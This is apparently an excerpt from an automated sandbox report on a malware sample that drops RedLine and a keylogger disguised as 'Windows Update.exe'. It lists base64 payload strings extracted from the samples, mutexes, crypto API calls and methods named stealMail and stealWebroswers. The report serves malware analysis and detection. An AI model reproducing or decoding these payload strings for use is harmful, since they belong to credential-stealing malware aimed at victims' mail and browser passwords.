                  Source: 61bc7bd88d10e97264127fe545415b17.exe.16.dr, Class1.csBase64 encoded string: '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
                  Source: 16.2.RedLine.exe.580000.0.unpack, Class1.csBase64 encoded string: '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
                  Source: 16.0.RedLine.exe.580000.0.unpack, Class1.csBase64 encoded string: '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
                  Source: WindowsUpdate.exe.17.dr, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.csBase64 encoded string: 'Ty3Lk8RnQfYL8aK1VgHq22paeblr7aqlRzHxRfjEXdlNccbW8zqh6kQeot5YJx3a', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeMutant created: \Sessions\1\BaseNamedObjects\61bc7bd88d10e97264127fe545415b17SGFjS2Vk
                  Source: Keylogger.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: Keylogger.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: Keylogger.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: Keylogger.exe.0.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                  Source: Windows Update.exe.2.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: Windows Update.exe.2.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: Windows Update.exe.2.dr, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: Windows Update.exe.2.dr, Form1.csCryptographic APIs: 'CreateDecryptor'
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: Hpdyv8oO3j.exeStatic file information: File size 1634464 > 1048576
                  Source: Hpdyv8oO3j.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x174c00
                  Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: .pdb8 source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: mscorlib.pdbH4s source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Roaming\Windows Update.PDBE source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.404011011.0000000006D70000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Keylogger.exe, Windows Update.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbn source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmp
                  Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Keylogger.exe, Windows Update.exe, vbc.exe, 00000019.00000002.567099655.0000000000400000.00000040.00000001.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: Windows Update.exe, 00000011.00000002.404126730.0000000006DD4000.00000004.00000001.sdmp
                  Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Keylogger.exe, Windows Update.exe, vbc.exe
                  Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb86 source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: oC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: rlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: Keylogger.exe.0.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Keylogger.exe.0.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Keylogger.exe.0.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Keylogger.exe.0.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Windows Update.exe.2.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Windows Update.exe.2.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Windows Update.exe.2.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: Windows Update.exe.2.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: WindowsUpdate.exe.17.dr, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: WindowsUpdate.exe.17.dr, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: WindowsUpdate.exe.17.dr, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: WindowsUpdate.exe.17.dr, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
